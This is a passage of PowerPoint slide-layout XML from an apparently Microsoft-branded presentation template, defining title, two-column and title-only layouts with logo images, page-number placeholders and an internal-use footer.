        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20"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22" name="Picture 21" descr="MSSVC_wL_Transparent.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086600" y="6419088"/>
            <a:ext cx="2081571" cy="438912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30"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
        <p:nvSpPr>
          <p:cNvPr id="31"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32"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28744921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2# Topic Title_Subtitle_Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12"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a:xfrm>
            <a:off x="304800" y="228600"/>
            <a:ext cx="8534400" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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304800" y="1219200"/>
            <a:ext cx="8534400" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buSzPct val="10000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304800" y="636232"/>
            <a:ext cx="8534400" cy="506767"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20"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22" name="Picture 21" descr="MSSVC_wL_Transparent.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086600" y="6419088"/>
            <a:ext cx="2081571" cy="438912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30"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
        <p:nvSpPr>
          <p:cNvPr id="31"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32"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
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8659240" y="128728"/>
            <a:ext cx="457200" cy="195528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Page#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14" descr="icon-glossary.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8352410" y="48640"/>
            <a:ext cx="285750" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14508120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3 Topic Title_TwoContent">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"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04800" y="914400"/>
            <a:ext cx="4114800" cy="5410200"/>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24400" y="914400"/>
            <a:ext cx="4114800" cy="5410200"/>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7" name="Picture 16" descr="MSSVC_wL_Transparent.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086600" y="6419088"/>
            <a:ext cx="2081571" cy="438912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26"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7"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
        <p:nvSpPr>
          <p:cNvPr id="14"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10492248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3# Topic Title_TwoContent">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"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04800" y="914400"/>
            <a:ext cx="4114800" cy="5410200"/>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24400" y="914400"/>
            <a:ext cx="4114800" cy="5410200"/>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7" name="Picture 16" descr="MSSVC_wL_Transparent.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086600" y="6419088"/>
            <a:ext cx="2081571" cy="438912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26"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7"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
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8659240" y="128728"/>
            <a:ext cx="457200" cy="195528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Page#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14" descr="icon-glossary.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8352410" y="48640"/>
            <a:ext cx="285750" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31668599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4 Topic Title_Subtitle_TwoContent">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10"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a:xfrm>
            <a:off x="304800" y="228600"/>
            <a:ext cx="8534400" cy="609600"/>
          </a:xfrm>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04800" y="1216152"/>
            <a:ext cx="4114800" cy="5108447"/>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24400" y="1216152"/>
            <a:ext cx="4114800" cy="5108447"/>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4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="636232"/>
            <a:ext cx="8534400" cy="506767"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12"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8" name="Picture 17" descr="MSSVC_wL_Transparent.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086600" y="6419088"/>
            <a:ext cx="2081571" cy="438912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26"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
        <p:nvSpPr>
          <p:cNvPr id="27"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8"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36333091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4# Topic Title_Subtitle_TwoContent">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10"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a:xfrm>
            <a:off x="304800" y="228600"/>
            <a:ext cx="8534400" cy="609600"/>
          </a:xfrm>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04800" y="1216152"/>
            <a:ext cx="4114800" cy="5108447"/>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24400" y="1216152"/>
            <a:ext cx="4114800" cy="5108447"/>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304800" y="636232"/>
            <a:ext cx="8534400" cy="506767"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12"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8" name="Picture 17" descr="MSSVC_wL_Transparent.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086600" y="6419088"/>
            <a:ext cx="2081571" cy="438912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26"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
        <p:nvSpPr>
          <p:cNvPr id="27"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8"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
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8659240" y="128728"/>
            <a:ext cx="457200" cy="195528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Page#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13" descr="icon-glossary.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8352410" y="48640"/>
            <a:ext cx="285750" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20138731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2.5 Topic Title_Subheads_TwoContent">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"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04800" y="914400"/>
            <a:ext cx="4116358" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="24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447800"/>
            <a:ext cx="4116358" cy="487680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914400"/>
            <a:ext cx="4117975" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="24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21225" y="1447800"/>
            <a:ext cx="4117975" cy="487680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9" name="Picture 18" descr="MSSVC_wL_Transparent.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086600" y="6419088"/>
            <a:ext cx="2081571" cy="438912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27"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
        <p:nvSpPr>
          <p:cNvPr id="28"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9"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5458822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5# Topic Title_Subheads_TwoContent">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"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04800" y="914400"/>
            <a:ext cx="4116358" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="24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447800"/>
            <a:ext cx="4116358" cy="487680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914400"/>
            <a:ext cx="4117975" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="24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21225" y="1447800"/>
            <a:ext cx="4117975" cy="487680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9" name="Picture 18" descr="MSSVC_wL_Transparent.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086600" y="6419088"/>
            <a:ext cx="2081571" cy="438912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27"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
        <p:nvSpPr>
          <p:cNvPr id="28"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9"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
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8659240" y="128728"/>
            <a:ext cx="457200" cy="195528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Page#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14" descr="icon-glossary.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8352410" y="48640"/>
            <a:ext cx="285750" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16126816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2.6 Title Only">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"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3" name="Picture 12" descr="MSSVC_wL_Transparent.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086600" y="6419088"/>
            <a:ext cx="2081571" cy="438912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="6476302"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft Confidential - For Internal Use Only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23"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
        <p:nvSpPr>
          <p:cNvPr id="24"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2956309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fr-F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FDB1C4-1BAF-460F-8361-CB4FBEAC1087}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8/3/2023</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B25136CE-EE85-4FE3-9E4A-262CAB4753F1}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8186582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6# Title Only">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"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3" name="Picture 12" descr="MSSVC_wL_Transparent.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086600" y="6419088"/>
            <a:ext cx="2081571" cy="438912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="6476302"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft Confidential - For Internal Use Only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23"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
        <p:nvSpPr>
          <p:cNvPr id="24"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9" name="Text Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8659240" y="128728"/>
            <a:ext cx="457200" cy="195528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
